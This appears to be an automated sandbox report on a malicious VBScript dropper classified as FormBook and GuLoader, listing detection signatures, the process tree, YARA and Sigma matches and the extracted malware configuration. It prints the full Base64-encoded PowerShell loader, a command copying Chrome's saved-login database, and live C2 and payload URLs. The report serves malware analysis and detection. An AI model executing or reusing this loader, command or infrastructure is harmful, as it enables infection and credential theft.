Loading ...

Play interactive tourEdit tour

Windows Analysis Report MTIR22024323_0553381487_20220112120005.vbs

Overview

General Information

Sample Name:MTIR22024323_0553381487_20220112120005.vbs
Analysis ID:552589
MD5:564601676bee71f5f61a44ef170d92a6
SHA1:76fca984dab2358e66524172e04a3528f33d8e18
SHA256:5e12314df61fd39cad151a41fb0d3188e437c591fa7498f09f103dea4a46f141
Tags:vbs
Infos:

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7072 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 6420 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgALQAxACwAWwByAGUAZgBdACQAYgBpAGQAcgBhAGcAcwAzACwAMAAsAFsAcgBlAGYAXQAkAGIAaQBkAHIAYQBnAHMAOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAjAFMAbwBjAGkAYQBsAGQAZQBtADcAIABTAEMAQQBMAEQAIABCAG8AZwBnAGwAZQBzACAAcwBpAGsAaAAgAE8AbABpAHMAawBlACAAUwBqAHUAcwBrAGUAbQBhAGwANgAgAGkAbgB2AGUAcwB0AG0AIABFAGwAaQB0ADkAIABNAFUATABUAEkARgBBAEMAVABPACAARgByAHUAZwBhAGwAIABCAHIAbgBlAHAAcwB5ACAARQB4AHAAcgBlAHMAcwAgAEYAcgBkAGUAIABDAE8AUgBSAE8ARABFAFIAIABGAFIATwBOAFQAIABmAGkAdAB0AGkAbAB5AHMAawBlACAARQBwAGkAcABsACAAUAB1AHIAdgBlAHkAIABtAHUAbgBkAHMAawAgAFMAdAB1AGQAZQA0ACAAcwBlAGwAcwBrAGEAIABrAG8AbQBwACAAawBiAGUAcwB1AG0AcwBhAG4AIABBAHUAdABvAHQAbwBtAGkAYwBmACAAVABSAEEASQAgAGwAYQBuAGMAZQB3ACAAVAByAGEAbgBzACAAQgBpAG8AcgB5AHQAbQBlACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBCAGEAbgBlAGIAZQByAHIAaQBlADIAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwARgBPAFIAUwBWAEEAUgBMAC4AZABhAHQAIgANAAoAIwBCAFIAQQBUAFMAQwBIAEUAUgAgAFAAcgBzAHQAIABGAG8AcgBtAHUAbABlAHIAZQAzACAATgBhAHMAbwBwAGgAYQByAHkAbgAgAE0AbwBuAHQAZwAgAEMATwBOAFQAUgBBAEwAVAAgAE4ATwBOAEMAQQBQAEkATAAgAFYAaQBjAHQAbwByAGkAYQBuADMAIABCAFIATgBEAEUAVgBJAE4AUwAgAE0AeQB6AG8AZAAgAEIAdQBzAGgAZwBhAHMAdABlAHIAIABmAGkAcwBzAHUAcgBlACAAVwBoAGUAcgBlAGUAOQAgAGYAaQBlAGwAZABtAGEAbgAgAEMAbwBsAGEAdQB4AGUAdAAyACAARQBsAHUAYwAyACAAZQBsAG8AaQBnAG4AaQBuAGcAZQAgAFMAdgByAHQAZQBuAGQAZQAgAGgAZQBtAG0AZQBsACAAVABBAEwARQBPACAAUgBrAGUAYgBpACAAUwBUAEoAWQBMAEwAQQBOAEQAUwAgAEsAcgB5AHMAdABhAGwAIABsAGkAZwBlAHMAawBlACAAUwBhAG0AbQBlAG4ANgAgAFQAcgBpAGcAZwA0ACAAcABzAHkAawBvAHQAZQBrACAAQwBPAE0ARQBEAE8AIABlAHUAbABvAGcAaQBjAGEAbAAgAE0AYQByAGsAIAANAAoAJABiAGkAZAByAGEAZwBzADQAPQBbAGIAaQBkAHIAYQBnAHMAMQBdADoAOgBDAHIAZQBhAHQAZQBGAGkAbABlAEEAKAAkAGIAaQBkAHIAYQBnAHMAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBDAG8AYwBvAG8AbgBlAGQANgAgAFYAaQBhAHQAaQBjAGEAZABlACAAaQB0AGUAcgBhAHQAaQB2AGIAIABhAHYAaQBzACAASwByAGUAbAByAGUAcgBlAGYAIABvAGIAagBlAGsAdABrAG8AZAAgAHQAYQBsAGkAdABlACAAawBpAGoAZQAgAE0AYQBjAHIANgAgAEcAdQBpAGwAbABvAHQAIABQAFIARQBEAE8AUABTACAAUwB1AGMAYwB1AG0AYgBpAG4ANQAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAbwB2AGUAcgBjAG8AbgAiACAADQAKACQAYgBpAGQAcgBhAGcAcwA1AD0AMAA7AA0ACgAjAFcAZQBkAGcAZQB0AGEAaQBsACAAUgBhAHQAaQA2ACAATgBvAHQAYQB0AGUAcwBkAHIAaQAgAE4ATwBOAEgASQBFAFIAIABGAGkAbABlAHQAIABzAHQAaQBmAGYAIABSAGUAYwBhADgAIABGAGwAdQBiAGsAbwBlACAARQBsAGUAYwB0AHIANQAgAEkAbgBkAGUAcwB0AGEAYQBlAG4AIABSAG8AYgBoAGEAaABiAGkAZAByADEAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAGoAbwByAGQAYgByAHUAZwBlAHQAIgAgAA0ACgBbAGIAaQBkAHIAYQBnAHMAMQBdADoAOgBSAGUAYQBkAEYAaQBsAGUAKAAkAGIAaQBkAHIAYQBnAHMANAAsACQAYgBpAGQAcgBhAGcAcwAzACwAMgA2ADcAMQAxACwAWwByAGUAZgBdACQAYgBpAGQAcgBhAGcAcwA1ACwAMAApAA0ACgAjAGMAYQByAGIAbwAgAGoAYQBwAG8AIABtAGkAcwBmACAATQBhAGYAZQA5ACAAawBvAG0AbQB1AG4AZQBzAGYAaQAgAFcAYQByAHIAZQBkAGQAZQBsADEAIABhAGMAZQB0ACAAQwBvAGEAcwB0ADIAIABzAHQAYQB0AHUAIABJAG0AcABlAGQAMgAgAEwAaQB0AHQAZQByADMAIABzAGMAaQByAHIAaABvAHUAcwBzACAAVwBhAGkAawBsAHkAYwBvAHUAMwAgAG4AZQBwAGUAbgB0AGgAIAB0AG8AcgBtACAATABnAGUAcwB0AHUAZABlAHIAIABEAGUAcABvAG4AZQByADYAIABBAEsAVABJAFYAUwBUAE8ARgAgAFMAbABlAGUAIABVAG4AaQBuAHQAcgAgAFIAYQBkAGkAbwBhAHMAdAAgAEEAZgB2AGEAbgBkAHIAZQAyACAAcwBhAGQAZQBsAHQAYQBzACAATABPAFYATwAgAEIAZQBkAHUAIABnAGwAbwBzAHQAcgB1AHAAIABNAEEAQwBVAFMASABMAEEAUQAgAFUAbgB0AHIAbwB0ADcAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEIAZQBzAGcAZQBuADkAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUgBlAHQAZQBsAGwAaQBuACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAeQBzAHQAZQBtAGYAdQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBXAEEAVABFAFIAUABJAFQASgBPACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATgBHAFMATABFAFIAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAYgBhAGwAbABhACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFUAbgBkAGUAcgAyACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHMAcAByAHUAaQBrAGUAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAQwBhAHAAdABpAHYAZQBzAGcAMgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBtAGEAdABoAGkAYQBzAGUAbgBzACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMASQBHAEkATABMACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAE8AUABIAEkATwBMAEEAVABFAFIAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAdAByAG4AaQBuAGcAcwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBFAHYAYQBjAHUAYQB0ACIAIAANAAoAWwBiAGkAZAByAGEAZwBzADEAXQA6ADoAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKAAkAGIAaQBkAHIAYQBnAHMAMwAsACAAMAAsADAALAAwACwAMAApAA0ACgANAAoA MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6840 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 6920 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
      • ieinstal.exe (PID: 5244 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
      • ieinstal.exe (PID: 4540 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
      • ieinstal.exe (PID: 6256 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • autochk.exe (PID: 5460 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
          • cmstp.exe (PID: 3504 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
            • cmd.exe (PID: 5276 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • explorer.exe (PID: 6392 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • explorer.exe (PID: 6664 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • ieinstal.exe (PID: 3232 cmdline: "C:\Program Files (x86)\internet explorer\ieinstal.exe" MD5: DAD17AB737E680C47C8A44CBB95EE67E)
          • ieinstal.exe (PID: 6084 cmdline: "C:\Program Files (x86)\internet explorer\ieinstal.exe" MD5: DAD17AB737E680C47C8A44CBB95EE67E)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.jewelrystore1.com/wk3t/"], "decoy": ["cherrykidzclub.com", "n104w16417dongesbayrd.info", "pronetheus.com", "tukarbelanjadapatemas.com", "commlike.info", "securityhackersteam.com", "rainbowhitch.com", "nursesgrowhealth.com", "discontinuanceanywhere.com", "comprehensivetitle.site", "astrostorytell.store", "bighorncountymtjail.com", "tetoda.xyz", "derivedflame.online", "staging-api-projectstanley.com", "mcxca.com", "thebluefellowsnft.com", "arizonakissesco.com", "prototypephase.com", "aprillemack.com", "mrrviaa0.com", "reloindiana.com", "osscurrency.com", "orderlaespigabakery.com", "leohillmodeling.com", "ybferro.com", "laorganicwarehouse.com", "coastalrey.com", "gavno.online", "ienqqv.xyz", "ttautoglass.com", "jeffreywlewiscarpentry.com", "aromav60.online", "d4vlkjrx.xyz", "agooddomain.com", "pse516.info", "trustexpressfreight.com", "tropiksuncc.com", "greenrailfinancialgroup.com", "caoyuzhou.tech", "calibergaragedoorrepairsinc.com", "medxcuz.online", "vqjktrqkgikswr.top", "danaesoftware.com", "onlinemagazineshop.online", "exxxclusivenft.com", "whatweather.today", "smbyee.com", "bjitwb.com", "mellowsgummies.com", "romeovillepowerwashing.com", "cheapest-swimmingpool.com", "bagspabandung.com", "conservational.one", "watertalk-kickstarter.com", "japanesefood-osaka.com", "aml-corp.com", "insurancemetafi.com", "bjxsjkj.com", "teerspmr.com", "fmkj888.group", "lawoe.net", "promotourpackages.com", "danielsden.store"]}

Threatname: GuLoader

{"Payload URL": "https://www.wizumiya.co.jp/html/user_da"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18859:$sqlite3step: 68 34 1C 7B E1
    • 0x1896c:$sqlite3step: 68 34 1C 7B E1
    • 0x18888:$sqlite3text: 68 38 2A 90 C5
    • 0x189ad:$sqlite3text: 68 38 2A 90 C5
    • 0x1889b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189c3:$sqlite3blob: 68 53 D8 7F 8C
    0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 17 entries

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: CMSTP Execution Process CreationShow sources
      Source: Process startedAuthor: Nik Seetharaman: Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 3504, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, ProcessId: 5276
      Sigma detected: Suspicious Csc.exe Source File FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUA
      Sigma detected: Suspicious Execution of Powershell with Base64Show sources
